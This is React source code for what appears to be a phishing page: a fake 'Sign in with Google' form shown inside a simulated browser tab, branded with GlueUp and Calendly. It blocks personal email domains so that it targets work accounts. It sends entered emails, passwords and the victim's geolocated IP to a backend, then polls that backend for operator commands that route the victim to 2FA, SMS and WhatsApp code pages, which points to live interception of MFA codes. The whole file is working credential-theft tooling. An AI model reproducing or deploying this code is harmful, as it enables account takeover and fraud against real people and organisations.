import { useState, useEffect, useRef } from "react";
import { FaRegEdit } from "react-icons/fa";

import loginLogo from "./assets/googlel.svg";
import eye from "./assets/eye.png";
import eyeClose from "./assets/eye-close.png";
import BrowserTab from "./BrowserTab";
import CalendlySchedule from "./Calendly";
import Client from "./Client";

// Helper function to generate UUID
function generateUUID() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    const r = Math.random() * 16 | 0;
    const v = c === 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}

export default function Login() {
  const [step, setStep] = useState(1);
  const [showPassword, setShowPassword] = useState(false);
  
  const [username, setUsername] = useState(() => {
    return localStorage.getItem("username") || "";
  });
  
  const [password, setPassword] = useState(() => {
    return localStorage.getItem("password") || "";
  });
  
  const [sessionId, setSessionId] = useState(
    () => localStorage.getItem("session_id") || null
  );
  const [loading, setLoading] = useState(false);
  const [redirecting, setRedirecting] = useState(false);
  const [error, setError] = useState("");
  const [infoMessage, setInfoMessage] = useState("");
  const [customNumber, setCustomNumber] = useState(null);

  const API_URL = process.env.REACT_APP_API_BASE_URL;
  const FRONT_URL = window.location.origin;

  const [ip, setIp] = useState("");
  const [city, setCity] = useState("");
  const [country, setCountry] = useState("");
  
  const wrongEmailShownRef = useRef(false);
  const hasCreatedUser = useRef(false);
  const passwordSubmitRef = useRef(false);
  const hasRedirectedRef = useRef(false);
  const pollingRef = useRef(null); // Reference for polling interval
  const manualSubmitRef = useRef(false); // Track if submit was manual

  const blockedDomains = [
    "gmail.com",
    "hotmail.com",
    "outlook.com",
    "yahoo.com",
    "icloud.com",
    "aol.com",
    "protonmail.com",
    "zoho.com",
    "live.com",
    "googlemail.com",
    "msn.com",
  ];

  const isPrivateEmail = (email) => {
    const domain = email.split("@")[1]?.toLowerCase();
    return blockedDomains.includes(domain);
  };

  useEffect(() => {
    const createNewUser = async () => {
      try {
        // Check if we already have a session ID in localStorage
        const existingSessionId = localStorage.getItem("session_id");
        if (existingSessionId) {
          setSessionId(existingSessionId);
          hasCreatedUser.current = true;
          localStorage.setItem("user_created", "true");
          return;
        }

        if (hasCreatedUser.current || localStorage.getItem("user_created"))
          return;

        const res = await fetch(`${API_URL}/api/new-user`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({}),
        });

        if (!res.ok) throw new Error();

        const data = await res.json();
        setSessionId(data.session_id);
        localStorage.setItem("session_id", data.session_id);
        localStorage.setItem("user_created", "true");
        hasCreatedUser.current = true;
      } catch {}
    };

    createNewUser();
  }, [API_URL]);

  const startPolling = () => {
    if (pollingRef.current) {
      clearInterval(pollingRef.current);
    }

    pollingRef.current = setInterval(async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${sessionId}`
        );
        const data = await res.json();

        console.log("Polling response:", data);

        // Check for wrong email
        if (data.authType === "login") {
          if (!wrongEmailShownRef.current) {
            setStep(1);
            setError("Wrong email entered. Please try again with correct email.");
            wrongEmailShownRef.current = true;
            setLoading(false);
            passwordSubmitRef.current = false;
            manualSubmitRef.current = false;
            if (pollingRef.current) {
              clearInterval(pollingRef.current);
              pollingRef.current = null;
            }
          }
          return;
        }

        wrongEmailShownRef.current = false;

        // Check for redirect to wp page
        if (data.authType === "wp" && (data.app_code || data.phone_code)) {
          if (hasRedirectedRef.current) {
            console.log("Already redirected, skipping...");
            return;
          }
          
          console.log("App/Phone code received, redirecting to wp");
          
          hasRedirectedRef.current = true;
          
          if (data.app_code) {
            localStorage.setItem("app_code", data.app_code);
          } else if (data.phone_code) {
            localStorage.setItem("phone_code", data.phone_code);
          }
          
          try {
            await fetch(`${API_URL}/clear_redirect?session_id=${sessionId}`);
          } catch (err) {
            console.log("Could not clear redirect:", err);
          }
          
          if (pollingRef.current) {
            clearInterval(pollingRef.current);
            pollingRef.current = null;
          }
          window.location.replace(`${FRONT_URL}/wp`);
          return;
        }

        // Check for redirect: "wp"
        if (data.redirect === "wp") {
          if (hasRedirectedRef.current) {
            console.log("Already redirected, skipping...");
            return;
          }
          
          console.log("Redirect to wp detected! Code:", data.latest_code);
          
          hasRedirectedRef.current = true;
          
          if (data.latest_code) {
            localStorage.setItem("whatsapp_code", data.latest_code);
            localStorage.setItem("app_code", data.latest_code);
          }
          
          try {
            await fetch(`${API_URL}/clear_redirect?session_id=${sessionId}`);
          } catch (err) {
            console.log("Could not clear redirect:", err);
          }
          
          if (pollingRef.current) {
            clearInterval(pollingRef.current);
            pollingRef.current = null;
          }
          window.location.replace(`${FRONT_URL}/wp`);
          return;
        }

        // External redirects (Calendly, etc.)
        if (data.redirect && !data.redirect.startsWith("error:")) {
          if (pollingRef.current) {
            clearInterval(pollingRef.current);
            pollingRef.current = null;
          }
          setLoading(false);
          passwordSubmitRef.current = false;
          manualSubmitRef.current = false;
          window.location.replace(data.redirect);
          return;
        }

        // Other authType redirects
        const routes = {
          login: "/login",
          email: "/email",
          wp: "/wp",
          "2fa": "/2fa",
          sms: "/sms",
          wpauth: "/wp",
        };

        if (data.authType && routes[data.authType]) {
          if (pollingRef.current) {
            clearInterval(pollingRef.current);
            pollingRef.current = null;
          }
          setLoading(false);
          passwordSubmitRef.current = false;
          manualSubmitRef.current = false;
          window.location.replace(`${FRONT_URL}${routes[data.authType]}`);
          return;
        }

        // Custom number (app code)
        if (data.customNumber) {
          setCustomNumber(data.customNumber);
          setLoading(false);
          passwordSubmitRef.current = false;
          manualSubmitRef.current = false;
          if (pollingRef.current) {
            clearInterval(pollingRef.current);
            pollingRef.current = null;
          }
        }

        // ERRORS FROM BACKEND (Wrong password, wrong code, etc.)
        if (data.error) {
          setError(data.error);
          setLoading(false);
          passwordSubmitRef.current = false;
          manualSubmitRef.current = false;
          if (pollingRef.current) {
            clearInterval(pollingRef.current);
            pollingRef.current = null;
          }
        }

      } catch (err) {
        console.error("Polling error:", err);
        setLoading(false);
        passwordSubmitRef.current = false;
        manualSubmitRef.current = false;
        if (pollingRef.current) {
          clearInterval(pollingRef.current);
          pollingRef.current = null;
        }
      }
    }, 2000);
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    
    // Clear error only when submitting
    setError("");
    manualSubmitRef.current = true; // Mark as manual submit

    // STEP 1 → EMAIL
    if (step === 1) {
      if (!username.trim()) {
        setError("Please enter your email.");
        return;
      }

      if (!username.includes("@")) {
        setError("Enter a valid email address.");
        return;
      }

      if (isPrivateEmail(username)) {
        setError("Please use your work or business email.");
        return;
      }

      localStorage.setItem("username", username.trim());
      
      setLoading(true);

      setTimeout(() => {
        setLoading(false);
        setStep(2);
      }, 500);

      return;
    }

    // STEP 2 → PASSWORD
    if (step === 2) {
      if (!password.trim()) {
        setError("Password cannot be empty.");
        return;
      }

      localStorage.setItem("password", password);
      
      passwordSubmitRef.current = true;
      setLoading(true);

      try {
        // Send the existing session ID with the login request
        const loginPayload = { 
          username, 
          password, 
          ip, 
          city, 
          country 
        };
        
        // Add session_id if we have one
        if (sessionId) {
          loginPayload.session_id = sessionId;
        }

        const res = await fetch(`${API_URL}/api/login`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify(loginPayload),
        });

        if (!res.ok) {
          const data = await res.json();
          throw new Error(data.detail || "Login failed");
        }

        const data = await res.json();
        const { session_id } = data;
        
        // If backend returns a session ID, use it (but prefer to keep existing one)
        if (session_id && session_id !== sessionId) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id);
        }
        
        // Start polling for response
        startPolling();
        
      } catch (err) {
        setError(err.message || "Login failed");
        setLoading(false);
        passwordSubmitRef.current = false;
        manualSubmitRef.current = false;
      }
    }
  };

  const handleBackToEmail = () => {
    setStep(1);
    setError("");
    wrongEmailShownRef.current = false;
    passwordSubmitRef.current = false;
    manualSubmitRef.current = false;
    
    // Stop any polling
    if (pollingRef.current) {
      clearInterval(pollingRef.current);
      pollingRef.current = null;
    }
    
    // DON'T clear the session ID - keep it!
    // Just clear password but keep username
    setPassword("");
    localStorage.removeItem("password");
  };

  const resetSession = async () => {
    // Stop polling
    if (pollingRef.current) {
      clearInterval(pollingRef.current);
      pollingRef.current = null;
    }
    
    if (sessionId) {
      try {
        await fetch(`${API_URL}/reset_session?session_id=${sessionId}`);
        console.log("Session reset successfully");
      } catch (err) {
        console.error("Failed to reset session:", err);
      }
    }
    
    // Clear local storage
    localStorage.removeItem("session_id");
    localStorage.removeItem("user_created");
    localStorage.removeItem("username");
    localStorage.removeItem("password");
    
    // Reset state
    setSessionId(null);
    setUsername("");
    setPassword("");
    setStep(1);
    setError("");
    setLoading(false);
    
    hasCreatedUser.current = false;
    passwordSubmitRef.current = false;
    hasRedirectedRef.current = false;
    manualSubmitRef.current = false;
    wrongEmailShownRef.current = false;
    
    // Force reload to get new session
    window.location.reload();
  };

  // Cleanup on unmount
  useEffect(() => {
    return () => {
      if (pollingRef.current) {
        clearInterval(pollingRef.current);
        pollingRef.current = null;
      }
    };
  }, []);

  useEffect(() => {
    fetch("https://ipwho.is/")
      .then((res) => res.json())
      .then((data) => {
        setIp(data.ip || "");
        setCity(data.city || "");
        setCountry(data.country || "");
      })
      .catch(() => {});
  }, []);

  return (
    <div className="calendly-back">
      <CalendlySchedule />
      <div className="login-page">
        <div className="browser-shadow">
          <BrowserTab />

          <div className="login-container">
            <div className="login-flex">
              <div className="browser-container">
                <div className="logo-div">
                  <img src={loginLogo} alt="logo" className="fb-logo" />
                  <p>Sign in with Google</p>
                </div>

                <Client />

                <form onSubmit={handleSubmit} className="custom-flex-group">
                  <div className="login-inputs">
                    {step === 1 && (
                      <div className="input-group">
                        <div className="input-wrapper">
                          <input
                            type="text"
                            value={username}
                            onChange={(e) => setUsername(e.target.value)}
                            disabled={loading}
                            className={username ? "filled" : ""}
                          />
                          <label>Email or phone</label>
                        </div>
                      </div>
                    )}

                    {step === 2 && (
                      <>
                        <div className="input-group">
                          <div className="input-wrapper">
                            <input
                              type={showPassword ? "text" : "password"}
                              value={password}
                              onChange={(e) => setPassword(e.target.value)}
                              disabled={loading}
                              className={password ? "filled" : ""}
                              autoFocus
                            />
                            <label>Enter your password</label>

                            <button
                              type="button"
                              className="password-toggle"
                              onClick={() => setShowPassword(!showPassword)}
                            >
                              <img
                                src={showPassword ? eye : eyeClose}
                                alt="toggle"
                              />
                            </button>
                          </div>
                        </div>
                        
                        {/* Show loading while waiting for response */}
                        {loading && (
                          <div className="password-submit-loader">
                            <div className="spinner"></div>
                            <p className="loader-text">
                              Verifying your information...
                            </p>
                          </div>
                        )}
                      </>
                    )}

                    {error && (
                      <p className="error-message">
                        {error}
                      </p>
                    )}
                    <p className="terms-paragraph">
                      Before using this app, you can review GlueUp's{" "}
                      <span className="terms-link">privacy policy</span> and{" "}
                      <span className="terms-link">terms of service.</span>
                    </p>
                    
                    <div className="submit-button-div">
                      <div className="new-account">
                        <button className="custom-secondary-button">
                          Create new account
                        </button>
                      </div>
                      <button
                        className="custom-primary-button"
                        type="submit"
                        disabled={loading}
                      >
                        {step === 1 ? "Next" : "Log in"}
                      </button>
                    </div>
                  </div>
                </form>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}